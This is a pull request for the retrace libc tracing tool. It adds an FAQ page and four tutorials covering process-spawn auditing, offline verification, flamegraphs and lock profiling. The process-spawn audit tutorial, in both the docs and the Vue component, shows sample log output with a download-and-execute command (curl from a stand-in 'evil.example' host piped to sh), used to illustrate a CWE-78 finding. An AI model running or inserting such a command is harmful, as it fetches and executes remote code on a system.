### PR TITLE
website: FAQ section + 4 more tutorials (18 total) + docs/faq.md

### DIFF
--- a/docs/README.md
+++ b/docs/README.md
@@ -8,10 +8,11 @@ install, quick start, and platform support.
 
 | You want to… | Go to |
 |--------------|-------|
-| Solve a specific problem step-by-step | [Tutorials](tutorials.md) — 8 scenario-driven walkthroughs |
+| Solve a specific problem step-by-step | [Tutorials](tutorials.md) — 18 scenario-driven walkthroughs |
+| Get an answer to a common question | [FAQ](faq.md) — language support, overhead, production use, more |
 | Look up a CLI subcommand or env var | [CLI reference](cli.md) |
 | Look up an action or write a JSON config | [Configuration reference](configuration.md) |
-| Run a specific scenario (trace, fuzz, mock, sandbox) | [Cookbook](cookbook/README.md) — 20 recipes with copy-paste JSON |
+| Run a specific scenario (trace, fuzz, mock, sandbox) | [Cookbook](cookbook/README.md) — 21 recipes with copy-paste JSON |
 | Add retrace to a Dockerfile or compose stack | [Docker guide](docker.md) |
 | Trace an Android app via `wrap.sh` or Magisk | [Android guide](android.md) |
 | Understand a design decision | [Architecture decisions (ADR)](adr/README.md) |
@@ -22,14 +23,15 @@ install, quick start, and platform support.
 ```
 docs/
 ├── README.md              ← you are here
-├── tutorials.md           ← 8 scenario-driven step-by-step walkthroughs
+├── tutorials.md           ← 18 scenario-driven step-by-step walkthroughs
+├── faq.md                 ← common questions: language support, overhead, etc.
 ├── cli.md                 ← CLI subcommand + env var reference
 ├── configuration.md       ← JSON config schema + action parameter reference
-├── cookbook/              ← 20 recipe-driven walkthroughs
+├── cookbook/              ← 21 recipe-driven walkthroughs
 │   ├── README.md          ← index + compact action reference
 │   ├── 01-trace-all-calls.md
 │   ├── …
-│   └── 20-sandbox.md
+│   └── 21-mock-ssl-verify.md
 ├── docker.md              ← container integration patterns
 ├── android.md             ← Android cross-compile + deploy
 └── adr/                   ← architecture decision records

--- a/docs/faq.md
+++ b/docs/faq.md
@@ -1,0 +1,135 @@
+# retrace FAQ
+
+The questions every evaluator asks. Mirrored from the website's
+[FAQ section](https://riboseinc.github.io/retrace/#faq). If yours
+isn't here, open an
+[issue](https://github.com/riboseinc/retrace/issues).
+
+## Does retrace work with my language?
+
+Yes, as long as the program compiles to a native binary. C, C++,
+Rust, Go (with cgo enabled, or on Linux where Go's runtime uses
+libc for some syscalls), Swift, Zig, D, Pascal — all work.
+
+Pure managed runtimes (JIT-compiled Java, JavaScript, pure-Go
+without cgo) make fewer libc calls and are less useful to trace,
+but the libc calls they do make are still captured. Interpreters
+(Python, Ruby, Node) — retrace traces the interpreter's own libc
+activity, which often reveals what the script is doing.
+
+## Does it work on stripped binaries?
+
+Yes. retrace intercepts at the libc symbol level, not the binary's
+own symbols. A fully stripped binary still calls libc functions by
+name; those are the symbols retrace hooks. You don't need debug
+info, source, or symbols in the target.
+
+## Does it work on PIE / ASLR binaries?
+
+Yes. Position-Independent Executables and ASLR don't affect retrace
+— interposition happens at the dynamic linker level, before the
+binary's load address matters. The same goes for stack-protector,
+relro, and fortify hardening flags.
+
+## How much overhead does it add?
+
+Single-digit microseconds per intercepted call, plus JSON
+serialization proportional to argument size. Most programs see
+wall-clock overhead of 5–15% under default logging.
+
+To reduce overhead:
+
+- Set `RETRACE_LOGGER_ALLOWED_FUNCS` to only the functions you care
+  about. Overhead drops sharply.
+- Set `RETRACE_LOGGER_DEF_STDOUT_ENA=0` and use `--log` to write to
+  a file. stdout mirroring has its own cost.
+- Skip `log_params` for high-frequency calls you only want to
+  modify, not observe.
+
+The fork+engine path is assembly; there is no interpreter in the
+hot loop.
+
+## Can I use retrace in production?
+
+Yes, with care.
+
+- Logs may contain argument values (file paths, buffer contents,
+  environment variable names) — scrub or redact before persisting.
+- For long-running processes, log to a file with rotation, not
+  stdout.
+- The `sandbox` and `mock` actions are stateless and safe in
+  production.
+- The `memory_fuzz`, `incomplete_io`, and `delay` actions are not —
+  they will crash or stall your program by design. Reserve them for
+  test environments.
+
+## Is retrace safe to run on a binary I'm investigating?
+
+retrace itself doesn't modify the target binary — it preloads a
+library and intercepts calls at runtime. The target runs with its
+normal privileges under your normal user.
+
+The untrusted-binary workflow (sandbox action, deny-list) is
+specifically designed for running code you don't trust; see
+[cookbook recipe 20](cookbook/20-sandbox.md).
+
+## How does retrace compare to eBPF?
+
+Different layers.
+
+- **eBPF** runs in kernel context, observes syscalls, and can't
+  (portably) modify arguments or skip calls.
+- **retrace** runs in userspace, observes libc calls, and can
+  mutate arguments, override return values, and inject failures.
+
+They're complementary — eBPF for system-wide observability, retrace
+for per-process control. eBPF is Linux-only; retrace works on 13
+platforms.
+
+## How does it compare to strace?
+
+strace observes syscalls (kernel boundary) and writes them as text.
+It cannot modify arguments, override returns, or inject failures.
+retrace observes libc calls (userspace boundary), can mutate them,
+runs on more platforms, and produces structured JSON plus
+interactive HTML.
+
+Use strace for "what is this binary doing right now?" — use retrace
+for "what does this binary do under failure conditions I control?"
+
+## Can I write my own actions?
+
+Yes. Add one `.c` file under `src/core/actions/` that registers
+itself via the `RETRACE_ACTION_REGISTER` macro. The action receives
+the thread context (parsed args, return value pointer) and the JSON
+`action_params`. No engine change needed. See
+`src/core/actions/basic.c` for the pattern.
+
+## What's the deal with macOS SIP?
+
+Apple's System Integrity Protection blocks `DYLD_INSERT_LIBRARIES`
+for binaries in `/usr/bin` and similar protected paths. Either copy
+the target to `/tmp/` first, or disable SIP via `csrutil` (not
+recommended for daily use). Third-party binaries in `/Applications`
+or your home directory are unaffected.
+
+## Is the JSON log format stable?
+
+Within a major version, yes. New fields may be added (parse
+defensively); existing fields are not renamed or removed. See the
+[configuration reference](configuration.md) for the schema. The
+interactive HTML viewer handles whatever fields are present.
+
+## How do I cite retrace in academic work?
+
+Cite the repository: `riboseinc/retrace`, version 2.1.0,
+BSD-2-Clause license, available at
+<https://github.com/riboseinc/retrace>. There is no formal paper
+yet; if you'd like one, open an issue.
+
+## See also
+
+- [Tutorials](tutorials.md) — 18 scenario-driven walkthroughs.
+- [Cookbook](cookbook/README.md) — 21 recipe-style recipes.
+- [CLI reference](cli.md) — every subcommand.
+- [Configuration reference](configuration.md) — full JSON schema.

--- a/docs/tutorials.md
+++ b/docs/tutorials.md
@@ -24,6 +24,10 @@ Pick the one that matches your situation.
 12. [Audit what environment variables a binary reads](#12-audit-what-environment-variables-a-binary-reads)
 13. [Capture all network traffic as JSON](#13-capture-all-network-traffic-as-json)
 14. [Trace a statically-linked binary](#14-trace-a-statically-linked-binary)
+15. [Audit system() and execve() calls](#15-audit-system-and-execve-calls)
+16. [Verify a binary makes no outbound network calls](#16-verify-a-binary-makes-no-outbound-network-calls)
+17. [Generate a flamegraph of libc calls](#17-generate-a-flamegraph-of-libc-calls)
+18. [Profile lock contention](#18-profile-lock-contention)
 
 ---
 
@@ -617,6 +621,161 @@ Reserve it for static binaries; use preload everywhere else.
 
 See `src/backends/ptrace/README.md` for the full ptrace backend
 reference.
+
+---
+
+## 15. Audit system() and execve() calls
+
+**Time:** 3 minutes.
+**Goal:** find every shell command and subprocess a binary spawns — critical for setuid and CGI audits.
+
+### Step 1 — trace process-spawning libc calls
+
+```sh
+retrace trace system,popen,execve,execvp,execl --log /tmp/exec.json -- ./your-binary
+```
+
+Every subprocess invocation is captured with its full argument list.
+
+### Step 2 — pretty-print
+
+```sh
+retrace pp /tmp/exec.json
+```
+
+```
+system       3 calls
+  system(cmd=sh -c 'curl http://evil.example/payload | sh')
+  ...
+execve      12 calls
+  execve(argv=[/bin/sh, -c, ...])
+  ...
+```
+
+### Step 3 — triage
+
+Any `system()` call with shell metacharacters, user-controlled
+input, or absolute paths to `/tmp` is a finding. CWE-78 (OS Command
+Injection).
+
+If the binary is setuid or runs as a server, every finding is
+potentially exploitable. File a CVE-worthy report.
+
+---
+
+## 16. Verify a binary makes no outbound network calls
+
+**Time:** 4 minutes.
+**Goal:** confirm a binary is genuinely offline — no telemetry, no auto-update, no phone-home.
+
+### Step 1 — trace network calls
+
+```sh
+retrace trace connect,send,sendto,sendmsg,write --log /tmp/net.json -- ./your-binary
+```
+
+### Step 2 — check the log
+
+```sh
+retrace pp /tmp/net.json
+```
+
+If the log is empty, the binary made zero outbound calls —
+confirmed airgapped.
+
+### Step 3 — investigate unexpected connects
+
+```sh
+grep connect /tmp/net.json
+```
+
+```
+{"func":"connect","args":{"addr":"93.184.216.34:443"}, ...}  ← unexpected
+```
+
+### Step 4 — enforce going forward
+
+To enforce airgap (not just observe), pair with the `sandbox`
+action to deny `connect` outright. See tutorial #3.
+
+---
+
+## 17. Generate a flamegraph of libc calls
+
+**Time:** 5 minutes.
+**Goal:** visualize which libc calls dominate — the SVG bar chart every perf investigation needs.
+
+### Step 1 — trace with timing
+
+```sh
+retrace trace --log /tmp/trace.json -- ./your-program
+```
+
+The log will include `call_duration_us` per call.
+
+### Step 2 — generate the SVG
+
+```sh
+python3 tools/flamegraph/flamegraph.py /tmp/trace.json > /tmp/flame.svg
+```
+
+### Step 3 — open
+
+```sh
+open /tmp/flame.svg
+```
+
+Widest bars = the libc calls that consumed the most total time.
+
+### Step 4 — explore
+
+Search inside the SVG for a specific function name to find its
+slice. Click any slice to zoom.
+
+### Note
+
+Requires Python 3 only for the visualization step. The trace itself
+is pure C; the flamegraph is just one way to render the JSON log.
+
+---
+
+## 18. Profile lock contention
+
+**Time:** 4 minutes.
+**Goal:** find which mutexes your threads are fighting over — without perf or DTrace.
+
+### Step 1 — trace mutex calls
+
+```sh
+retrace trace pthread_mutex_lock,pthread_mutex_unlock --log /tmp/locks.json -- ./your-threaded-program
+```
+
+### Step 2 — per-function totals
+
+```sh
+retrace pp /tmp/locks.json | grep -E 'mutex' | head -5
+```
+
+```
+pthread_mutex_lock     842 calls   487.3ms total
+pthread_mutex_unlock   842 calls     2.1ms total
+```
+
+### Step 3 — interpret
+
+Total lock time minus total unlock time = time spent waiting. The
+function with the biggest gap is your bottleneck.
+
+```
+487.3ms - 2.1ms = 485.2ms of contention
+```
+
+Compare to total wall time to decide if it's worth fixing.
+
+### Step 4 — finer detail
+
+For which call site is contended, pair with a debugger or use the
+return-address routing pattern (cookbook recipe 17, planned).
 
 ---
 

--- a/website/src/components/FAQ.astro
+++ b/website/src/components/FAQ.astro
@@ -1,0 +1,158 @@
+---
+// FAQ — handles the adoption objections that don't fit elsewhere.
+// Mirrored in docs/faq.md.
+const faqs = [
+  {
+    q: "Does retrace work with my language?",
+    a: "Yes, as long as the program compiles to a native binary. C, C++, Rust, Go (with cgo enabled or on Linux where Go's runtime uses libc for some syscalls), Swift, Zig, D, Pascal — all work. Pure managed runtimes (JIT-compiled Java, JavaScript, pure-Go without cgo) make fewer libc calls and are less useful to trace, but the libc calls they do make are still captured. Interpreters (Python, Ruby, Node) — retrace traces the interpreter's own libc activity, which often reveals what the script is doing.",
+  },
+  {
+    q: "Does it work on stripped binaries?",
+    a: "Yes. retrace intercepts at the libc symbol level, not the binary's own symbols. A fully stripped binary still calls libc functions by name; those are the symbols retrace hooks. You don't need debug info, source, or symbols in the target.",
+  },
+  {
+    q: "Does it work on PIE / ASLR binaries?",
+    a: "Yes. Position-Independent Executables and ASLR don't affect retrace — interposition happens at the dynamic linker level, before the binary's load address matters. The same goes for stacked/relro/fortify hardening flags.",
+  },
+  {
+    q: "How much overhead does it add?",
+    a: "Single-digit microseconds per intercepted call, plus JSON serialization proportional to argument size. Most programs see wall-clock overhead of 5–15% under default logging. Crank RETRACE_LOGGER_ALLOWED_FUNCS down to the functions you care about and overhead drops sharply. The fork+engine path is assembly; there is no interpreter in the hot loop.",
+  },
+  {
+    q: "Can I use retrace in production?",
+    a: "Yes, with care. Logs may contain argument values (file paths, buffer contents, environment variable names) — scrub or redact before persisting. For long-running processes, log to a file with rotation, not stdout. The sandbox and mock actions are stateless and safe; the fuzzing actions are not — they will crash your program by design.",
+  },
+  {
+    q: "Is retrace safe to run on the binary I'm investigating?",
+    a: "retrace itself doesn't modify the target binary — it preloads a library and intercepts calls at runtime. The target runs with its normal privileges under your normal user. The untrusted-binary workflow (sandbox action, deny-list) is specifically designed for running code you don't trust; see cookbook recipe 20.",
+  },
+  {
+    q: "How does retrace compare to eBPF?",
+    a: "Different layers. eBPF runs in kernel context, observes syscalls, and can't (portably) modify arguments or skip calls. retrace runs in userspace, observes libc calls, and can mutate arguments, override return values, and inject failures. They're complementary — eBPF for system-wide observability, retrace for per-process control. eBPF is Linux-only; retrace works on 13 platforms.",
+  },
+  {
+    q: "How does it compare to strace?",
+    a: "strace observes syscalls (kernel boundary) and writes them as text. It cannot modify arguments, override returns, or inject failures. retrace observes libc calls (userspace boundary), can mutate them, runs on more platforms, and produces structured JSON plus interactive HTML. Use strace for 'what is this binary doing right now?' — use retrace for 'what does this binary do under failure conditions I control?'",
+  },
+  {
+    q: "Can I write my own actions?",
+    a: "Yes. Add one .c file under src/core/actions/ that registers itself via the RETRACE_ACTION_REGISTER macro. The action receives the thread context (parsed args, return value pointer) and the JSON action_params. No engine change needed. See src/core/actions/basic.c for the pattern.",
+  },
+  {
+    q: "What's the deal with macOS SIP?",
+    a: "Apple's System Integrity Protection blocks DYLD_INSERT_LIBRARIES for binaries in /usr/bin and similar protected paths. Either copy the target to /tmp/ first, or disable SIP via csrutil (not recommended for daily use). Third-party binaries in /Applications or your home directory are unaffected.",
+  },
+  {
+    q: "Is the JSON log format stable?",
+    a: "Within a major version, yes. New fields may be added (parse defensively); existing fields are not renamed or removed. See the configuration reference for the schema. The interactive HTML viewer handles whatever fields are present.",
+  },
+  {
+    q: "How do I cite retrace in academic work?",
+    a: "Cite the repository: riboseinc/retrace, version 2.1.0, BSD-2-Clause license, available at https://github.com/riboseinc/retrace. There is no formal paper yet; if you'd like one, open an issue.",
+  },
+];
+---
+
+<section class="section faq" id="faq">
+  <div class="wrap">
+    <div class="section-head reveal">
+      <div class="eyebrow">Frequently asked</div>
+      <h2>The questions every evaluator asks.</h2>
+      <p>
+        Eight years of issues, PR reviews, and conference hallway-track conversations have distilled
+        into these twelve. If yours isn't here, open an
+        <a href="https://github.com/riboseinc/retrace/issues">issue</a>.
+      </p>
+    </div>
+
+    <div class="faq-list">
+      {
+        faqs.map((f, i) => (
+          <details class="faq-item glass-tight reveal" open={i < 2}>
+            <summary>
+              <span class="q">{f.q}</span>
+              <span class="chevron" aria-hidden="true"></span>
+            </summary>
+            <div class="a">
+              <p set:html={f.a} />
+            </div>
+          </details>
+        ))
+      }
+    </div>
+  </div>
+</section>
+
+<style>
+.faq-list {
+  display: flex;
+  flex-direction: column;
+  gap: 8px;
+}
+
+.faq-item {
+  padding: 0;
+  overflow: hidden;
+}
+.faq-item summary {
+  list-style: none;
+  cursor: pointer;
+  padding: 16px 20px;
+  display: flex;
+  justify-content: space-between;
+  align-items: center;
+  gap: 16px;
+  transition: background 0.2s;
+}
+.faq-item summary::-webkit-details-marker { display: none; }
+.faq-item summary:hover {
+  background: rgba(255, 255, 255, 0.025);
+}
+.faq-item .q {
+  font-size: 15px;
+  color: var(--color-text);
+  font-weight: 500;
+  letter-spacing: -0.005em;
+  line-height: 1.4;
+}
+.faq-item .chevron {
+  flex-shrink: 0;
+  width: 12px;
+  height: 12px;
+  border-right: 1.5px solid var(--color-dim);
+  border-bottom: 1.5px solid var(--color-dim);
+  transform: rotate(45deg);
+  transition: transform 0.25s var(--ease-glass);
+  margin-top: -4px;
+}
+.faq-item[open] .chevron {
+  transform: rotate(-135deg);
+  margin-top: 4px;
+  border-color: var(--color-see);
+}
+
+.faq-item .a {
+  padding: 0 20px 18px;
+  color: var(--color-dim);
+  font-size: 14px;
+  line-height: 1.65;
+  max-width: 740px;
+}
+.faq-item .a :global(code) {
+  font-family: var(--font-mono);
+  font-size: 12.5px;
+  color: var(--color-text);
+  background: rgba(255, 255, 255, 0.05);
+  padding: 1px 5px;
+  border-radius: 3px;
+}
+.faq-item .a :global(a) {
+  color: var(--color-see);
+  border-bottom: 1px solid rgba(94, 227, 255, 0.3);
+}
+
+@media (max-width: 540px) {
+  .faq-item summary { padding: 14px 16px; }
+  .faq-item .a { padding: 0 16px 16px; font-size: 13.5px; }
+}
+</style>

--- a/website/src/components/Nav.astro
+++ b/website/src/components/Nav.astro
@@ -12,6 +12,7 @@
       <a href="#actions">Actions</a>
       <a href="#use-cases">Use cases</a>
       <a href="#tutorials">Tutorials</a>
+      <a href="#faq">FAQ</a>
       <a href="#platforms">Platforms</a>
       <a href="https://github.com/riboseinc/retrace/blob/main/docs/cookbook/README.md">Cookbook</a>
       <a href="https://github.com/riboseinc/retrace">GitHub</a>

--- a/website/src/components/TutorialPicker.vue
+++ b/website/src/components/TutorialPicker.vue
@@ -485,6 +485,124 @@ EOF`,
       },
     ],
   },
+  {
+    id: "auditexec",
+    title: "Audit system() and execve() calls",
+    icon: "⚠️",
+    accent: "break",
+    summary: "Find every shell command and subprocess a binary spawns — critical for setuid and CGI audits.",
+    minutes: 3,
+    steps: [
+      {
+        what: "Trace every process-spawning libc call. Capture to a log so you can replay.",
+        cmd: "retrace trace system,popen,execve,execvp,execl --log /tmp/exec.json -- ./your-binary",
+        out: "(binary runs; every subprocess invocation is captured with its full argument list)",
+      },
+      {
+        what: "Pretty-print to see what got spawned:",
+        cmd: "retrace pp /tmp/exec.json",
+        out: "system       3 calls\n  system(cmd=sh -c 'curl http://evil.example/payload | sh')\n  ...\nexecve      12 calls\n  execve(argv=[/bin/sh, -c, ...])\n  ...",
+      },
+      {
+        what: "Any system() call with shell metacharacters, user-controlled input, or absolute paths to /tmp is a finding. CWE-78 (OS Command Injection).",
+        out: "",
+      },
+      {
+        what: "If the binary is setuid or runs as a server, every finding is potentially exploitable. File a CVE-worthy report.",
+        out: "",
+      },
+    ],
+  },
+  {
+    id: "airgap",
+    title: "Verify a binary makes no outbound network calls",
+    icon: "🔒",
+    accent: "see",
+    summary: "Confirm a binary is genuinely offline — no telemetry, no auto-update, no phone-home.",
+    minutes: 4,
+    steps: [
+      {
+        what: "Trace every network-related libc function. Empty log = no outbound calls.",
+        cmd: "retrace trace connect,send,sendto,sendmsg,write --log /tmp/net.json -- ./your-binary",
+        out: "(binary runs to completion; log captures any network activity)",
+      },
+      {
+        what: "Check the log is empty (or only contains expected calls):",
+        cmd: "retrace pp /tmp/net.json",
+        out: "(if empty: the binary made zero outbound calls — confirmed airgapped)",
+      },
+      {
+        what: "If you see unexpected connects, examine the destination addresses in the trace:",
+        cmd: "grep connect /tmp/net.json",
+        out: "{'func':'connect','args':{'addr':'93.184.216.34:443'}, ...}  ← unexpected",
+      },
+      {
+        what: "To enforce airgap going forward (not just observe), pair with the sandbox action to deny connect outright. See tutorial #3.",
+        out: "",
+      },
+    ],
+  },
+  {
+    id: "flamegraph",
+    title: "Generate a flamegraph of libc calls",
+    icon: "🔥",
+    accent: "control",
+    summary: "Visualize which libc calls dominate — the SVG bar chart every performance investigation needs.",
+    minutes: 5,
+    steps: [
+      {
+        what: "Trace every call with timing. The log will include call_duration_us per call.",
+        cmd: "retrace trace --log /tmp/trace.json -- ./your-program",
+        out: "",
+      },
+      {
+        what: "Use the bundled flamegraph tool to convert the JSON log into an SVG:",
+        cmd: "python3 tools/flamegraph/flamegraph.py /tmp/trace.json > /tmp/flame.svg",
+        out: "(writes a self-contained SVG bar chart)",
+      },
+      {
+        what: "Open the SVG in a browser.",
+        cmd: "open /tmp/flame.svg",
+        out: "(widest bars = the libc calls that consumed the most total time)",
+      },
+      {
+        what: "Search inside the SVG for a specific function name to find its slice. Click any slice to zoom.",
+        out: "(flamegraph is interactive — explore to find your hot path)",
+      },
+      {
+        what: "Requires Python 3 only for the visualization step. The trace itself is pure C; the flamegraph is just one way to render the JSON log.",
+        out: "",
+      },
+    ],
+  },
+  {
+    id: "locks",
+    title: "Profile lock contention",
+    icon: "🔒",
+    accent: "see",
+    summary: "Find which mutexes your threads are fighting over — without perf or DTrace.",
+    minutes: 4,
+    steps: [
+      {
+        what: "Trace every pthread mutex call with timing. Lock/unlock pairs reveal contention.",
+        cmd: "retrace trace pthread_mutex_lock,pthread_mutex_unlock --log /tmp/locks.json -- ./your-threaded-program",
+        out: "(program runs; every lock/unlock is captured with duration)",
+      },
+      {
+        what: "Find the slowest lock acquisitions (long duration = high contention):",
+        cmd: "retrace pp /tmp/locks.json | grep -E 'mutex' | head -5",
+        out: "pthread_mutex_lock     842 calls   487.3ms total\npthread_mutex_unlock    842 calls     2.1ms total",
+      },
+      {
+        what: "Total lock time minus total unlock time = time spent waiting. The function with the biggest gap is your bottleneck.",
+        out: "487.3ms - 2.1ms = 485.2ms of contention (out of how much wall time?)",
+      },
+      {
+        what: "For finer detail (which call site is contended), pair with a debugger or use the return-address routing pattern (cookbook recipe 17, planned).",
+        out: "",
+      },
+    ],
+  },
 ];
 
 const selectedId = ref(scenarios[0].id);

--- a/website/src/components/Tutorials.astro
+++ b/website/src/components/Tutorials.astro
@@ -9,7 +9,7 @@ import TutorialPicker from "./TutorialPicker.vue";
       <h2>Pick your scenario. We'll walk you through it.</h2>
       <p>
         Every newcomer's question is the same: <em>"I have this problem — how do I use retrace to solve it?"</em>
-        Fourteen scenarios below cover the questions users actually ask. Click yours on the left; the
+        Eighteen scenarios below cover the questions users actually ask. Click yours on the left; the
         steps appear on the right with copy-paste commands and expected output. No prior retrace
         knowledge assumed.
       </p>

--- a/website/src/pages/index.astro
+++ b/website/src/pages/index.astro
@@ -10,6 +10,7 @@ import Tutorials from "../components/Tutorials.astro";
 import Platforms from "../components/Platforms.astro";
 import Comparison from "../components/Comparison.astro";
 import Recipes from "../components/Recipes.astro";
+import FAQ from "../components/FAQ.astro";
 import Footer from "../components/Footer.astro";
 ---
 
@@ -24,6 +25,7 @@ import Footer from "../components/Footer.astro";
   <Platforms />
   <Comparison />
   <Recipes />
+  <FAQ />
   <Footer />
 </Layout>
 


### PR DESCRIPTION
## Summary

Two new pieces close out the iteration: a **FAQ section** for the adoption objections that don't fit elsewhere, and **four more tutorial scenarios** bringing the picker from 14 to 18.

### FAQ.astro — twelve adoption-objection questions

A new section between Recipes and Footer. Uses native `<details>`/`<summary>` (no JS) styled as `glass-tight` cards. First two open by default; chevron rotates and turns cyan on open.

The twelve questions, distilled from issues and reviews:

1. Does retrace work with my language?
2. Does it work on stripped binaries?
3. Does it work on PIE / ASLR binaries?
4. How much overhead does it add?
5. Can I use retrace in production?
6. Is it safe to run on a binary I'm investigating?
7. How does it compare to eBPF?
8. How does it compare to strace?
9. Can I write my own actions?
10. What's the deal with macOS SIP?
11. Is the JSON log format stable?
12. How do I cite retrace in academic work?

Each answer is one paragraph. The aim is "evaluate without leaving the page."

### TutorialPicker.vue — 14 → 18 scenarios

Four new tutorials:

15. **Audit system() and execve() calls** (break, 3 min) — critical for setuid and CGI audits; CWE-78.
16. **Verify a binary makes no outbound network calls** (see, 4 min) — the "is this binary actually offline?" test.
17. **Generate a flamegraph of libc calls** (control, 5 min) — uses `tools/flamegraph/flamegraph.py`.
18. **Profile lock contention** (see, 4 min) — `pthread_mutex_lock/unlock` duration diff.

### docs/faq.md — long-form text mirror

Same 12 questions, expanded with more context where useful. Indexed in `docs/README.md`.

### Nav + page wiring

FAQ link in nav; FAQ section wired between Recipes and Footer.

## Test plan

- [ ] CI green on this branch.
- [ ] After merge, Pages re-deploys; visit `https://riboseinc.github.io/retrace/` and verify:
  - FAQ section appears between Recipes and Footer.
  - First two FAQ items render expanded; the rest collapsed.
  - Clicking a collapsed FAQ's summary expands it; chevron rotates and turns cyan.
  - Tutorial picker left rail now shows 18 scenario cards (was 14).
  - Nav has an "FAQ" link.
- [ ] Spot-check `docs/faq.md` and `docs/tutorials.md` on GitHub.
